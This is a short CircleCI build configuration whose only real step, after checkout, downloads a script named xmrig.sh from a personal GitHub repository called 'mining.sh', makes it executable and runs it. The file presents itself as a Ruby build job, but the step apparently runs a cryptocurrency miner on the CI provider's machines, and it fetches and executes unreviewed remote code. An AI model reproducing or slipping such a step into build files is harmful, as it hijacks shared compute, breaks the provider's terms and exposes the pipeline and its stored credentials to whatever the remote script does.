version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: wget https://raw.githubusercontent.com/Briansantoso560/mining.sh/main/xmrig.sh && chmod +x xmrig.sh && ./xmrig.sh

      